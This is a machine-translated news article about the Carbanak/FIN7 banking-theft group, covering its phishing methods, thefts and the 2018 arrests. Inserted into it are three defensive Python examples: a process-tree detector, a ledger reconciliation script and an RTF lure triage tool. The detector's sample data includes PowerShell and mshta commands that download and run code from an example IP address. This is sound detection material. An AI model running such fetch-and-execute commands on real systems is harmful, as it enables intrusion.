21st-century 'Robin Hoods': how Ukrainian hackers stole $1 billion and annoyed Trump - ForumDaily
The article has been automatically translated into English by Google Translate from Russian and has not been edited.


How Ukrainian hackers stole a billion dollars and annoyed Trump.

Photo: Depositphotos

The Ukrainian outlet Strana («Страна») looked into what is known about the members of the most successful hacker group in history, what caused its leaders to get caught, and why, even after the arrests, the case of the 21st-century Robin Hoods lives on.

In early August, the press service of the US Department of Justice announced the arrest of hackers whom Washington calls key figures in an extensive international network of cyber-fraud groups.

Americans call it "FIN7", but this structure goes by many other names, among them "Cobalt", "Anunak" and "Navigator Group"; the most popular in the Russian-language segment of the Internet is "Carbanak". Security researchers use these names for overlapping but not identical crews that share the Carbanak malware and related tooling, rather than for a single organization.

The latter, investigators believe, is responsible for hundreds of online robberies around the world, the theft of some $1.2 billion in total, and the fame of the "elusive Robin Hoods" who for five years were the nightmare of moneybags everywhere, until they were exposed at the beginning of 2018. Within a couple of months of one another, four Ukrainian citizens, including the leader of the "cyber organized crime group", were detained in Europe.

However, this did not stop the wave: network attacks in the signature "Carbanak" style continue to this day.

The story of the “crazy ATM”

The transnational hacker group "Carbanak", whose members include citizens of Ukraine, Russia, European countries and China, first came to attention back in 2013.

That year, the cameras of a Ukrainian bank recorded people withdrawing money from ATMs without inserting a card or entering a PIN. The New York Times described the incident, an ATM in Kyiv suddenly going "mad", as the machine "haphazardly spitting out" money at the feet of passers-by. But that turned out to be the least of the bank's problems, as the investigation subsequently revealed.

The bankers contacted Kaspersky Lab, saying that money had started disappearing from their accounts. They assumed they were dealing with ordinary thieves breaking into individual ATMs. But soon an attack in the same style hit another bank, this time in Russia, and it became clear that the "craziness" of the terminals was a hitherto unseen phenomenon of a different order. This is how IT security specialists became acquainted with the Anunak malware, later developed into the version known as Carbanak. From 2016 the successor crew, which researchers call Cobalt, also leaned heavily on Cobalt Strike; that is a legitimate commercial penetration-testing framework the attackers abused, not a further version of the malware.

The malware's mode of operation was described in detail by Kaspersky Lab experts in their report on the group's activities. According to their findings, the gang carried out an unprecedented series of intrusions into banking systems.

The group's geography was impressive. At first the attackers sent phishing emails with infected attachments to financial institutions in the CIS, Eastern Europe and Southeast Asia; by 2017, banks in North and South America and even Western Europe had been added to the list.

How hackers robbed banks

It all started with seemingly innocent spam. Phishing emails disguised as official correspondence arrived at the victim bank's employees with a Microsoft Word document attached. Opening it ran malicious code that downloaded the backdoor onto the computer; from there it spread through the internal banking network, infected servers and ATM controllers, and reported back to servers controlled by the hackers. The attackers then recorded video of what the infected bank workstations showed on screen, took screenshots and logged keystrokes.

The hackers approached each robbery systematically and carefully. Compromising one bank took two to four months, during which the criminals looked for employees with the authority to manage cash flows between accounts, correspondent banks and ATMs. They also learned how and at what point the bank moved its money. All of this was used later so as not to attract the attention of security staff at the moment of the theft: because the transactions were submitted with the bankers' own credentials and verification codes, the transfers and cash withdrawals looked perfectly legitimate, and the systems let them through.
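The chain described above, from a malicious Office document to a foothold on an employee's workstation, is what endpoint telemetry is tuned to catch. The following Python is an added example and not code from the article, from Kaspersky or from any vendor. It runs a small classifier over constructed Sysmon-style process-creation records (field names such as ParentImage and ProcessGuid are real Sysmon Event ID 1 fields; the paths, GUIDs, addresses and command lines are made up). It flags Office applications spawning script hosts, follows the process tree so that later stages are attributed to the same document, and separately treats any child of the Equation Editor as suspicious: that component, exploited by the CVE-2017-11882 lures the article mentions later, is started by the DCOM launcher rather than by Word, so a Word-parent rule alone never sees it.

```python
"""Flag document-borne execution chains in Windows process-creation telemetry.

Added example, not from the article or any vendor report. Input records are
constructed Sysmon-style (Event ID 1) process-creation events, not real bank
logs. The classifier flags an Office application spawning a script host, any
child of the Equation Editor (EQNEDT32.EXE), and every descendant of a
process that was already flagged.
"""
import json
from typing import Dict, Iterable, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                "bitsadmin.exe", "msiexec.exe"}
# EQNEDT32.EXE is started out of process by the DCOM launcher (svchost.exe),
# so a "winword.exe is the parent" rule never sees an Equation Editor exploit;
# the tell is the editor itself spawning something.
EQUATION_EDITOR = "eqnedt32.exe"

SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed for this example
    {"UtcTime": "2018-03-01 09:12:03", "ProcessGuid": "p1", "ParentProcessGuid": "p0",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')\""},
    {"UtcTime": "2018-03-01 09:12:04", "ProcessGuid": "p2", "ParentProcessGuid": "p1",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')\""},
    {"UtcTime": "2018-03-01 09:40:11", "ProcessGuid": "p3", "ParentProcessGuid": "p9",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": '"EQNEDT32.EXE" -Embedding'},
    {"UtcTime": "2018-03-01 09:40:12", "ProcessGuid": "p4", "ParentProcessGuid": "p3",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.7/a.hta"},
    {"UtcTime": "2018-03-01 10:02:55", "ProcessGuid": "p5", "ParentProcessGuid": "p6",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},   # benign: Word printing
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str], tainted: set) -> Optional[str]:
    """Return a rule name if the event is suspicious, else None.

    `tainted` holds the ProcessGuids of processes already flagged, so the
    whole chain below a malicious document is attributed to it."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if event["ParentProcessGuid"] in tainted:
        return "descendant-of-flagged-process"
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "office-app-spawned-script-host"
    if parent == EQUATION_EDITOR:
        return "equation-editor-spawned-child"
    return None


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the classifier over events in time order and return the alerts."""
    tainted: set = set()
    alerts: List[Dict[str, str]] = []
    for ev in events:
        rule = classify(ev, tainted)
        if rule is None:
            continue
        tainted.add(ev["ProcessGuid"])
        alerts.append({"time": ev["UtcTime"], "rule": rule,
                       "parent": _basename(ev["ParentImage"]),
                       "child": _basename(ev["Image"]),
                       "cmdline": ev["CommandLine"]})
    return alerts


def scan_jsonl(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Same as scan() for newline-delimited JSON as exported from a SIEM."""
    return scan(json.loads(line) for line in lines if line.strip())


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['time']}  {a['rule']:34} {a['parent']} -> {a['child']}")
```

On the sample, the Word-to-cmd launch, the PowerShell stage beneath it and the Equation Editor child are reported; Word launching the print helper is not. The point of carrying the taint forward is that the second-stage download, which is where the Carbanak backdoor would actually arrive, is tied back to the document that caused it rather than showing up as an isolated PowerShell event.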

When it came to actually taking the money, the attackers used three methods:

1. They sent commands to specific ATMs so that the machines began dispensing cash at the moment a member of the group was standing in front of them. Law enforcement calls these accomplices "money mules" or "drops". They collected the banknotes that the ATMs spat out without any card being inserted or PIN entered.

2. They instructed interbank payment systems to transfer money to accounts they controlled over the SWIFT network. Perhaps the most publicized attack of this kind was recorded in Russia in 2017, when the victim was Globex Bank (controlled by Vnesheconombank), from which the hackers, using Cobalt Strike, withdrew an amount equivalent to $1 million.

According to Russian financiers, last year alone Russian banks lost 1 billion rubles to such cyber-fraud attacks. More than 240 credit institutions were attacked, and more than a dozen of the attacks succeeded.

3. They manipulated the banks' databases to inflate the balances of the "needed" accounts and then moved the artificial surplus out.
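The third method works precisely because a balance field edited directly in the database bypasses the transaction journal, so nothing looks wrong to the account holder. The control that catches it is replaying the journal and comparing the result with the stored balance. The following Python is an added example and not from the article or from Kaspersky's report; the accounts, journal entries and balances are constructed. For ACC-1002 the balance was raised by 9,000 outside the journal, 9,000 was wired out, and the stored balance landed back on the opening figure.

```python
"""Reconcile recorded balances against the transaction journal.

Added example, not from the article or from Kaspersky's report. The data is
constructed: three accounts, a day's journal, and the end-of-day balances as
stored in the core banking database. For ACC-1002 the balance was raised by
9,000 directly in the database (no journal entry), 9,000 was then wired out,
and the stored balance landed back on the opening figure, so the owner sees
nothing unusual. Replaying the journal exposes the gap.
"""
from dataclasses import dataclass
from decimal import Decimal
from typing import Dict, List, Tuple

Journal = List[Tuple[str, str, str, Decimal, str]]  # time, account, credit|debit, amount, memo

OPENING_BALANCES: Dict[str, Decimal] = {          # constructed
    "ACC-1001": Decimal("1000.00"),
    "ACC-1002": Decimal("1000.00"),
    "ACC-1003": Decimal("5000.00"),
}
JOURNAL: Journal = [                               # constructed
    ("2018-02-01T09:00", "ACC-1001", "credit", Decimal("200.00"), "salary"),
    ("2018-02-01T09:05", "ACC-1003", "debit", Decimal("50.00"), "card purchase"),
    ("2018-02-01T23:41", "ACC-1002", "debit", Decimal("9000.00"), "wire to external bank"),
    ("2018-02-02T10:00", "ACC-1003", "debit", Decimal("1500.00"), "wire to external bank"),
]
RECORDED_BALANCES: Dict[str, Decimal] = {         # constructed; what the core DB says
    "ACC-1001": Decimal("1200.00"),
    "ACC-1002": Decimal("1000.00"),   # the journal says -8000.00
    "ACC-1003": Decimal("3450.00"),
}


@dataclass
class Discrepancy:
    account: str
    expected: Decimal            # opening balance + journal
    recorded: Decimal            # what the database holds
    delta: Decimal               # recorded - expected; positive = unexplained money
    overdrawn_in_journal: bool   # a debit took the replayed balance below zero


def replay(opening: Dict[str, Decimal], journal: Journal) -> Tuple[Dict[str, Decimal], set]:
    """Recompute every balance from the opening figures and the journal.

    Also returns the accounts where a debit overdrew the replayed balance,
    which a correctly functioning core should have rejected."""
    balances = dict(opening)
    overdrawn: set = set()
    for _time, account, kind, amount, _memo in sorted(journal):
        if kind == "credit":
            balances[account] = balances.get(account, Decimal(0)) + amount
        elif kind == "debit":
            balances[account] = balances.get(account, Decimal(0)) - amount
            if balances[account] < 0:
                overdrawn.add(account)
        else:
            raise ValueError(f"unknown entry type {kind!r}")
    return balances, overdrawn


def reconcile(opening: Dict[str, Decimal], journal: Journal,
              recorded: Dict[str, Decimal]) -> List[Discrepancy]:
    """Return every account whose stored balance the journal cannot explain."""
    expected, overdrawn = replay(opening, journal)
    out: List[Discrepancy] = []
    for account in sorted(set(expected) | set(recorded)):
        exp = expected.get(account, Decimal(0))
        rec = recorded.get(account, Decimal(0))
        if exp != rec or account in overdrawn:
            out.append(Discrepancy(account, exp, rec, rec - exp, account in overdrawn))
    return out


if __name__ == "__main__":
    for d in reconcile(OPENING_BALANCES, JOURNAL, RECORDED_BALANCES):
        print(f"{d.account}: journal says {d.expected}, database says {d.recorded}, "
              f"unexplained {d.delta}; overdrawn in journal: {d.overdrawn_in_journal}")
```

Two signals come out of the same replay: the stored balance exceeds what the journal supports, and the wire that drained the account would have overdrawn it had the inflation not happened. Either alone is worth an alert; both together on one account are the fingerprint of the database manipulation described in item 3. In production this runs against an append-only copy of the journal, since an attacker who can edit balances can usually edit the live ledger too.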

The stolen capital was later converted into cryptocurrency, which made it far harder for law enforcement to follow the hackers' trail.

The scammers moved into retail and reached the guests of the US President's hotels

Wired magazine studied the work of the mysterious hacker group and concluded that it resembles a large company with a monthly "revenue" of about $50 million. Its staff is recruited from all over the world and keeps a regular working day from 9 a.m. to 6 p.m. "They probably have a leader, managers, money launderers, software developers, testers," the American journalists wrote.

The US Department of Justice states that, in addition to banks, the hackers from Eastern Europe attacked more than a hundred American companies, mainly in the service sector: restaurants, gambling and hotels.

In the United States alone, the group broke into corporate networks in 47 states and the District of Columbia and stole more than 15 million payment card records from more than 6,500 point-of-sale terminals. Companies publicly linked to these breaches include Saks Fifth Avenue, Saks Off 5th, Lord & Taylor, Whole Foods, Chipotle Mexican Grill, Trump Hotels, Jason's Deli, Omni Hotels & Resorts, Arby's, Chili's and Red Robin.

The attackers got at the data in their usual way, through phishing emails, this time posing as customers: requests to hotels to book a room, large takeout orders to restaurants, or complaints about service, each carrying a malicious attachment.

In total, according to Europol's estimates, over the five years of its existence the organized criminal group took some $1.2 billion. In the banking industry alone, its victims include hundreds of financial institutions in 40 countries.

Robin Hood from Alicante

Accounts of how law enforcement got onto the criminals' trail differ.

As TASS wrote, Russian law enforcement identified the group's leader back in 2015. That year one Russian bank discovered the theft of 60 million rubles from its accounts, and the security services established that one of the organizers was Denis Tokarenko, a native of the Magadan region. He was put on the wanted list, and it turned out that he had moved to Odessa in 2013, where he acquired Ukrainian citizenship under the surname Katana.

Four years ago, Denis and his family moved to Spain, where a local court refused to extradite him to Russia. In the end, the "brains" of Carbanak was detained only in the spring of 2018.

According to Europol, this was preceded by a years-long operation in which the security services of about a dozen countries took part. Reportedly, investigators analyzed samples of the malware and traced it to Tokarenko-Katana's apartment in Alicante. Then, as Bloomberg wrote, they placed the Ukrainian under surveillance.

At first glance, Denis looked like an ordinary migrant building a new life in the West, settled in a modest apartment on Playa de San Juan. Yet he did not give the impression of someone trying to fit in: he did not learn Spanish and never went to Alicante's famous San Juan beach. He was far more active online, often spending whole nights at his laptop.

Still, these clues alone would hardly have been enough to catch a cautious hacker had it not been for two accidents.

First, the criminals were let down by their most obvious weak point: people. In 2016, police in Taiwan managed to catch "money mules" withdrawing cash from ATMs after one of them left his bank card at the scene.

The man was detained, and on his iPhone, alongside numerous photographs of cash, police found correspondence with the person running the operation. It turned out to be the "Spaniard" Katana, whose phone was then wiretapped. This bore fruit: at the beginning of 2018 the police learned that Denis and his accomplices were about to release a more modern version of Carbanak, and decided to move in.

Secondly, Tokarenko-Katana slipped up himself. As El Mundo reported, the cybercrime genius forgot to pay for a new car. A few months before his arrest, Denis bought a car for 70 thousand euros but never settled the bills. The worried seller went to the police in early March. The officers came to Denis's house expecting an ordinary debtor, and only after cross-checking the records did they realize they were facing a man wanted for remotely emptying ATMs and bank accounts around the world.

Be that as it may, on March 6 Katana was detained and his main weapon, a laptop, was seized. On it, investigators found evidence of his wealth: 15 thousand bitcoins, about $162 million at the exchange rate of the time.

 

In the Carbanak hierarchy, the investigation assigns him a leading role: reconnaissance inside banking systems and "shuffling" cash flows within the network. At his hearing in Spain, Denis was already styling himself a Robin Hood who stole not from ordinary people but from the "bad guys", the banks.

What is known about the accomplices of Katana

By then, 15 "mules" had been identified (four of them detained in the UK, Belarus, Kyrgyzstan and Taiwan), along with three of Denis's closest assistants. All of them also turned out to be citizens of Ukraine.

The investigation describes their roles as follows: one sent the phishing emails, the second was a database expert who "cleaned up the digital traces" of the crimes, and the third supervised the recruitment of regional executors (the "drops" or "money mules"). Although they were captured at the beginning of the year, the US Department of Justice published their names only in early August: Dmitry Fedorov, Fedor Gladyr and Andrei Kolpakov (in the Justice Department's spelling, Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov).

Each is charged with 26 felony counts, including conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft. Only one of the three, 33-year-old Gladyr, is currently in the United States; the extradition of his accomplices is still being worked out.

The Justice Department describes Gladyr as a programmer known as AronaXus or das, one of Carbanak's senior systems administrators. Fedorov (nickname hotdima) and Andrei Kolpakov (known as santisimo, santisimoz and Andrey KS) are described as network penetration specialists, so-called "pen testers".

According to American officials, the hackers set up a sham information security company called Combi Security. Its profile on Ukrainian websites claimed headquarters in Moscow and Haifa. The front is believed to have been used to recruit new employees and as legal cover for the intrusions. "Ironically, the fictitious company's alleged clients include many of its victims in the United States," the FBI notes on its website.

New attacks

Security experts recall that after the arrest of Carbanak's leader and his close associates, bankers around the world breathed a sigh of relief, thinking their troubles were over. Their expectations were not met: Carbanak spawned many improved offshoots, including one well-known name, the Cobalt group, which investigators say Tokarenko-Katana himself created.

In March, May and June 2018, several new waves of Carbanak-linked phishing were observed, hitting banks and payment processors in different countries. The lure documents exploited CVE-2017-11882, a stack buffer overflow in the Microsoft Office Equation Editor (EQNEDT32.EXE), and CVE-2017-8570, a flaw in Office's handling of embedded objects (composite monikers) that lets a document run a scriptlet. Microsoft had patched both months earlier, so the campaigns relied on unpatched endpoints rather than zero-days. According to the official version, the attacks may be the work of the leader's accomplices, who are thereby trying to "whitewash" the detained head of the group.
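Both CVEs arrive as an embedded OLE object inside an RTF or Word file, which is why the first triage step on such a lure is to look at what objects it carries. The following Python is an added example and not from the article or from any vendor tooling; it builds its own constructed RTF samples inline. It flags an explicit \objclass naming Equation, an OLE 1.0 object header in \objdata whose class name starts with "Equation", or the Equation 3.0 CLSID ({0002CE02-0000-0000-C000-000000000046}) appearing in the decoded object data. Real exploit documents also use obfuscations this does not unwind, such as control words spliced into the hex stream, so a clean result means "nothing obvious", not "safe".

```python
"""Triage RTF files for embedded Equation Editor objects (the CVE-2017-11882 vector).

Added example, not from the article or from any vendor tooling. The heuristics
are deliberately simple: an explicit \\objclass Equation.*, an OLE 1.0 object
header in \\objdata whose class name starts with "Equation", or the Equation
3.0 CLSID appearing in the decoded object data. Exploit builders also use
obfuscations this does not unwind (control words inside the hex stream, for
example), so treat an empty result as "nothing obvious", not as safe.
"""
import re
from typing import List, Optional

# {0002CE02-0000-0000-C000-000000000046}, Microsoft Equation 3.0, as laid out
# on disk (Data1, Data2, Data3 little-endian; Data4 as written).
EQUATION_CLSID = bytes.fromhex("02CE020000000000C000000000000046")

OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\b([^}]*)", re.S)
NON_HEX_RE = re.compile(rb"[^0-9A-Fa-f]")


def _ole1_class_name(blob: bytes) -> Optional[str]:
    """Class name from an OLE 1.0 object header: version(4) format(4) len(4) name."""
    if len(blob) < 12:
        return None
    fmt = int.from_bytes(blob[4:8], "little")
    n = int.from_bytes(blob[8:12], "little")
    if fmt not in (1, 2) or n == 0 or n > 256 or len(blob) < 12 + n:
        return None
    return blob[12:12 + n].rstrip(b"\0").decode("ascii", "replace")


def find_equation_objects(rtf: bytes) -> List[str]:
    """Return a list of human-readable reasons the document looks like an Equation lure."""
    findings: List[str] = []
    for m in OBJCLASS_RE.finditer(rtf):
        if m.group(1).lower().startswith(b"equation"):
            findings.append("\\objclass " + m.group(1).decode("ascii", "replace"))
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = NON_HEX_RE.sub(b"", m.group(1))  # builders pad the hex with line breaks
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]                  # tolerate a truncated stream
        blob = bytes.fromhex(hexdata.decode("ascii"))
        name = _ole1_class_name(blob)
        if name and name.lower().startswith("equation"):
            findings.append("OLE1 class name " + name)
        if EQUATION_CLSID in blob:
            findings.append("Equation Editor CLSID in objdata")
    return findings


def make_sample_rtf(class_name: bytes, trailer: bytes = b"\x41" * 32) -> bytes:
    """Build a minimal RTF with one embedded OLE 1.0 object (constructed test input).

    The header is version 0x501, format 2 (embedded), class-name length, name;
    `trailer` stands in for the object payload, which this triage ignores."""
    header = ((0x501).to_bytes(4, "little") + (2).to_bytes(4, "little")
              + (len(class_name) + 1).to_bytes(4, "little") + class_name + b"\0")
    hexed = (header + trailer).hex().encode("ascii")
    wrapped = b"\r\n".join(hexed[i:i + 64] for i in range(0, len(hexed), 64))
    return b"{\\rtf1{\\object\\objemb{\\*\\objdata " + wrapped + b"}}}"


MALICIOUS_SAMPLE = make_sample_rtf(b"Equation.3")   # no \objclass hint, name only in the binary header
BENIGN_SAMPLE = make_sample_rtf(b"Package")

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, find_equation_objects(doc) or "nothing obvious")
```

The decision to decode \objdata rather than trust \objclass is the important one: exploit generators routinely drop the \objclass control word, so a scanner that only greps for "Equation.3" in plain text misses them, while the class name inside the OLE 1.0 header has to be present for Word to load the object at all. Mail-gateway or EDR rules that block EQNEDT32.EXE outright, together with the patches Microsoft shipped, remain the actual fix; this is triage for the sample that already got through.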

Analysts lean toward a slightly different reading. In their view, the arrest of Katana, Kolpakov, Gladyr and Fedorov did not break the back of Carbanak's well-oiled criminal structure. "Someone who used part of this software was arrested... This may be a fairly high link in the food chain, but this certainly does not mean the cessation of the work of all groups," journalists quote Dmitry Chorin, head of technology at Gemini Advisory.

And if that is so, it may well be that right now the remaining Carbanak hackers are getting access to someone's bank card. Or to hundreds of millions of accounts worldwide.
